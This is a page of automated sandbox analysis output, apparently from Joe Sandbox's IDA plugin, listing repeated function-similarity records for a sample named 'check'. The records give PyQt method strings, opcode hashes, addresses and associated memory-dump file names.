                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?senderFromIndex@LongLong_Object@@Signal
                                                                                                                                                                                                                                          • String ID: QRegularExpressionValidator$senderSignalIndex$senderSignalIndex(self) -> int
                                                                                                                                                                                                                                          • API String ID: 2462028585-3156835661
                                                                                                                                                                                                                                          • Opcode ID: b63ca2c6e3ea51e66f8017ef49f53720f83499bc93aa2181409828ec7d4e8e0e
                                                                                                                                                                                                                                          • Instruction ID: 805c2ad10e3384337bb7783e07dab84b1c82d0a47d79d70b299e8ea4d99b73cc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b63ca2c6e3ea51e66f8017ef49f53720f83499bc93aa2181409828ec7d4e8e0e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE011A76A09A46C1EB109F61E8496A933A4FB84F90F914132C99E47324EF7DE959C384
                                                                                                                                                                                                                                          Function 00007FF89D981D70 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?doubleDoubleFloat_Format@@FromProperty@Text
                                                                                                                                                                                                                                          • String ID: QTextBlockFormat$textIndent$textIndent(self) -> float
                                                                                                                                                                                                                                          • API String ID: 2584946227-891602922
                                                                                                                                                                                                                                          • Opcode ID: 7117c8be7260dd6131076e3d15ba2c8d84077161f857732f4dc69d92684b14da
                                                                                                                                                                                                                                          • Instruction ID: 9264d24f2e2c49c5c35d03e64606f391a8689ce578a37a578190500400d17384
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7117c8be7260dd6131076e3d15ba2c8d84077161f857732f4dc69d92684b14da
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5011A37A08A46C5EB109F51E8496A933E4FB44FD4F918032CA9E47320EF7DE69AC344
                                                                                                                                                                                                                                          Function 00007FF89D985D70 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?mode@FromLayout@@LongLong_Mode@1@Page
                                                                                                                                                                                                                                          • String ID: QSurfaceFormat$alphaBufferSize$alphaBufferSize(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3770405607-3301355687
                                                                                                                                                                                                                                          • Opcode ID: 8840faa4f33a9595a65b95b3a8fed405de9ff6537a274219c17d1e6c06f8fb3c
                                                                                                                                                                                                                                          • Instruction ID: 6af9656e9cafbcbf5c31407db36893678e6fe761abfe281f2ae3512baff37cb8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8840faa4f33a9595a65b95b3a8fed405de9ff6537a274219c17d1e6c06f8fb3c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC011A76A08B46C1EB109F61E8496A933A4FB44FD0F914032D99E47324EF7CE95AC344
                                                                                                                                                                                                                                          Function 00007FF89D95E0B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?selectionCursor@@End@FromLongLong_Text
                                                                                                                                                                                                                                          • String ID: QTextCursor$selectionEnd$selectionEnd(self) -> int
                                                                                                                                                                                                                                          • API String ID: 1804637121-388535847
                                                                                                                                                                                                                                          • Opcode ID: b554f713f1e896e07991247548f3424fb63520df44eb863b76c2dabeeadfc684
                                                                                                                                                                                                                                          • Instruction ID: d4ff85c2d9879654da9461c47e50eea52c871e9c7877322e2a361cb8fe35142c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b554f713f1e896e07991247548f3424fb63520df44eb863b76c2dabeeadfc684
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0012C76A09A46C2EB10DF61E8496A933A4FB84FD4F914032C99E47324EF7DF559C344
                                                                                                                                                                                                                                          Function 00007FF89D9900F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?end@Bool_FromLongPainter@@
                                                                                                                                                                                                                                          • String ID: QPainter$end$end(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 3078279030-2907001754
                                                                                                                                                                                                                                          • Opcode ID: ff9ab01418b46240d2e4be3e200489357fda87eb3647f1769a2dc4e752484549
                                                                                                                                                                                                                                          • Instruction ID: c830b69c43468d9af7c75b9d0d0a8735afe42a7d9489648d476b7db8f12edfca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff9ab01418b46240d2e4be3e200489357fda87eb3647f1769a2dc4e752484549
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83012C36A08A46D1EB109F61E8596A933E4FB44F90F914032C99E47320EF7CE569C348
                                                                                                                                                                                                                                          Function 00007FF89D9680F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?verticalCursor@@FromLongLong_MovementText
                                                                                                                                                                                                                                          • String ID: QTextCursor$verticalMovementX$verticalMovementX(self) -> int
                                                                                                                                                                                                                                          • API String ID: 809924778-2152589566
                                                                                                                                                                                                                                          • Opcode ID: 802fc4828307869ec1570ed7fefe236d88c3d9862b71193516e603f40eeee678
                                                                                                                                                                                                                                          • Instruction ID: 1645bfe6ca53ce6d740093c73c2155e44b30af4c846ea22fcda90642ddf634a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 802fc4828307869ec1570ed7fefe236d88c3d9862b71193516e603f40eeee678
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5011A37A09A46C1EB109F61E8496A933A4FB44FD4F914032D99E47320EF7CE65AC344
                                                                                                                                                                                                                                          Function 00007FF89D9980D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?useBool_Extensions@FromHints@@LongStyle
                                                                                                                                                                                                                                          • String ID: QStyleHints$useRtlExtensions$useRtlExtensions(self) -> bool
                                                                                                                                                                                                                                          • API String ID: 1774567688-2275637497
                                                                                                                                                                                                                                          • Opcode ID: 642a920b34a23916b7a2edabf9dabc67b817dba99bb84ad9bd649b5836e61222
                                                                                                                                                                                                                                          • Instruction ID: 8d0636a9359da6376cc6a333ff1f455d7101f2b9d926bb8962b1f03c5aed90ff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 642a920b34a23916b7a2edabf9dabc67b817dba99bb84ad9bd649b5836e61222
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D011A36A09A46D1EB20DF21E8496A933E4FB40BD4F914032C99E47320EF7DE569C344
                                                                                                                                                                                                                                          Function 00007FF89D956020 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?availableDocument@@FromLongLong_Steps@TextUndo
                                                                                                                                                                                                                                          • String ID: QTextDocument$availableUndoSteps$availableUndoSteps(self) -> int
                                                                                                                                                                                                                                          • API String ID: 3083424710-3994648613
                                                                                                                                                                                                                                          • Opcode ID: df7aa769a23e3a1aebfdac480432c255ca28b6e5f67e700f76c14e00443e04a9
                                                                                                                                                                                                                                          • Instruction ID: bf77afdc4faf83db360b7b9a4afe9344586e45fc95b9effcacd4701ebae8b44e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df7aa769a23e3a1aebfdac480432c255ca28b6e5f67e700f76c14e00443e04a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF011A36A08A46C1EB109F61E8496A933A4FB44FD0F914032DA8E47324EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D9AA000 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
